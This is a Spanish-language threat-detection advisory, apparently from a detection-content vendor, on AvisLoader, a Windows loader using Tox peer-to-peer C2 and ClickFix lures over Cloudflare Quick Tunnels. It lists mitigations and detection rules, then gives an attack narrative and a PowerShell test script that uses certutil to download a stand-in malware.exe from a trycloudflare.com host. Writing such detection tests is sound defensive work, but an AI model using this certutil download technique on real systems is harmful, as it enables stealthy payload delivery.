AvisLoader emerge como un cargador de malware para Windows resistente
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
AvisLoader es un cargador de malware para Windows recién identificado que utiliza la red de mensajería peer-to-peer (P2P) Tox para comunicación de mando y control (C2). Este enfoque descentralizado permite a los operadores mantener la conectividad y reubicar los controladores sin depender de dominios fijos o servidores centralizados. El malware se distribuye comúnmente a través de cebos de ingeniería social ClickFix alojados en la infraestructura de Cloudflare.
Investigación
Varonis Threat Labs descubrió el cargador en un servidor de puesta en escena expuesto junto con su centro de mando y herramientas relacionadas. La investigación identificó un cebo ClickFix con tema de DocuSign que instruye a los usuarios a ejecutar comandos que recuperan cargas útiles a través de Túneles Rápidos de Cloudflare. El análisis del ejecutable encontró comunicación C2 basada en Tox, funcionalidad de bypass de UAC, y módulos diseñados para ocultar procesos maliciosos.
Mitigación
Las organizaciones deben entrenar a los usuarios para que reconozcan y reporten mensajes de firma de documentos que les pidan pegar comandos en terminales o en el cuadro de diálogo Ejecutar de Windows. Los equipos de seguridad deben monitorear el uso sospechoso de Cloudflare Workers y Quick Tunnels en cebos basados en la web. Detectar tráfico de red peer-to-peer (P2P) inesperado y cambios no autorizados a accesos directos del escritorio también puede ayudar a reducir el riesgo.
Respuesta
Cuando se detecta actividad de AvisLoader, los equipos de seguridad deben revisar la línea de procesos de shells de comandos e intérpretes de scripts lanzados tras visitar dominios sospechosos. Inspeccionar los endpoints para detectar accesos directos modificados, .backup archivos, y el artefacto VLCAssistant . La telemetría de la red también debe ser revisada para detectar tráfico inusual del protocolo Tox originado de hosts afectados.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Ejecutable sospechoso que solo contiene números en el nombre (vía cmdline)
Comunicación sospechosa de dominio Trycloudflare (vía DNS)
Intento sospechoso de ejecución de Curl [MacOS] (vía cmdline)
IOCs (HashSha256) para detectar: Conozca AvisLoader: Un cargador de Windows diseñado para perdurar tras un desmantelamiento
Detectar tráfico inesperado de Tox o Peer-to-Peer [Conexión de Red en Windows]
Detección de Ejecución Remota de Código a través de Shells de Comandos y Cloudflare Quick Tunnel [Creación de Procesos en Windows]
Ejecución de Simulación
-
Narrativa del Ataque & Comandos: Un adversario ha obtenido acceso inicial a una estación de trabajo. Para mantener la persistencia y descargar su carga útil modular secundaria, utilizan un Cloudflare Quick Tunnel para sortear el filtrado de salida. El atacante utiliza
certutil.exe, una utilidad incorporada de Windows, para descargar la carga útil desdehttps://malicious-tunnel-id.trycloudflare.com/payload.exe. Este método es elegido porquecertutiles un binario de confianza y el tráfico parece dirigirse a una infraestructura de Cloudflare legítima, lo que hace menos probable que sea marcado por filtros básicos de reputación de red. -
Script de Prueba de Regresión:
# Script de simulación para activar la regla de detección. # Esto utiliza certutil para intentar una descarga desde una dirección trycloudflare.com. $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe" Write-Host "[*] Simulando actividad del adversario: Descargando desde $targetUrl vía certutil..." # El siguiente comando está diseñado para activar las condiciones 'selection_tunnel' Y 'selection_tools'. certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe" if ($LASTEXITCODE -eq 0) { Write-Host "[+] Comando de simulación ejecutado con éxito." } else { Write-Host "[-] Comando fallido (esperado si la URL no existe, pero se debe generar telemetría)." } -
Comandos de Limpieza:
# Script de limpieza para eliminar la carga útil simulada y artefactos locales. $tempFile = "$env:TEMPmalware.exe" if (Test-Path $tempFile) { Remove-Item -Path $tempFile -Force Write-Host "[+] Limpieza de $tempFile" } else { Write-Host "[-] No se encontró artefacto para limpiar." }